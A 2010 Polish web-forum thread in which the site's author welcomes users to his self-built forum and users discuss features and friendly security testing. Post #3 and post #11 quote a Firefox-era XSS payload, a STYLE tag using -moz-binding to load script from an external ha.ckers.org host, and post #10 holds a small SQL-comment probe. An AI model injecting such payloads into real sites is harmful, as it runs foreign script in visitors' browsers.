Witam na forum

2010-08-17 22:56:52 Post #1 nospor

 
Witam Was na moim forum.
Forum, jak zresztą cała ta strona, jest mojego autorstwa. Zachęcam do korzystania z niego i zgłaszania ewentualnych uwag czy też propozycji nowej funkcjonalności. Na chwilę obecną z forum mogą korzystać tylko zalogowani użytkownicy.

@TODO:
- udostępnić forum dla gości - zrobione
- podgląd postów
- inne ewentualne rzeczy zaproponowane przez Was

ps: gdybyście mieli problem z przeniesiem zalogowania na forum, to wyczyście wszystkie ciastka z domeny nospor.pl

2010-08-17 23:43:31 Post #2 vokiel

 
Widzę ładnie wkomponowałeś te forum w całą stronę. Niedługo zamiast strony domowej będziesz tu miał pokaźny serwis

2010-08-17 23:46:27 Post #3 nospor

 
Niedługo zamiast strony domowej będziesz tu miał pokaźny serwis
Pożyjemy zobaczymy

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Widzę, iż mnie hakujesz.... dobrze, testuj a nuż widelec... lepiej żebym padł ofiarą Twojego ataku niż kogoś innego

2010-08-17 23:48:18 Post #4 vokiel

 
Czuwasz

Przetestowałem kilka opcji XSS, z 17-21 sztuk różnych ataków. Jak dla mnie Twoje forum jest XSS-Free

2010-08-17 23:52:27 Post #5 nospor

 
Dzięki za testy

2010-08-18 10:45:44 Post #6 Michał

 
Forum fajne, zwłaszcza, ze ma modularną budowę

Może warto pomyśleć nad rangami na forum np. Moderator Member

2010-08-18 10:52:39 Post #7 nospor

 
W założeniu miało to być proste forum.
Wstępne wersje co są w innych projektach, które pisałem, są naprawde proste. Tę tutaj już odpicowałem trochę. Z czasem więc pewnie i moderatorzy się pojawią

2010-08-18 11:22:49 Post #8 Michał

 
Pochwaliłbyś się jakimiś linkami do projektów na twoim CMS....

2010-08-18 12:24:00 Post #9 vokiel

 
Test php bbcode
1
2
3
4
5
6
7
8
9
10
11
12
13
try 
  {
      list($insert_id$total_rows) = DB::insert('users', array('username','password'))
          ->values(array('myusername',sha1('mypassword')))
          ->execute();
              
      echo $insert_id .' '.$total_rows ;
  }
  catch ( Database_Exception $e )
  {
      echo $e->getMessage();
  }

2010-08-18 22:16:51 Post #10 spawnm

 
a'la test /*

2010-08-20 14:17:18 Post #11 korey

 
Siema wszystkim.

zaciekawił mnie ten kawałek tekstu
1
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

powie ktos cos wiecej na ten temat.?

2010-08-20 17:29:14 Post #12 nospor

 
Jest to próba wykonania na tej stronie obcego kodu js. Takie obce kody mogą być naprawdę groźne.

Odpowiedz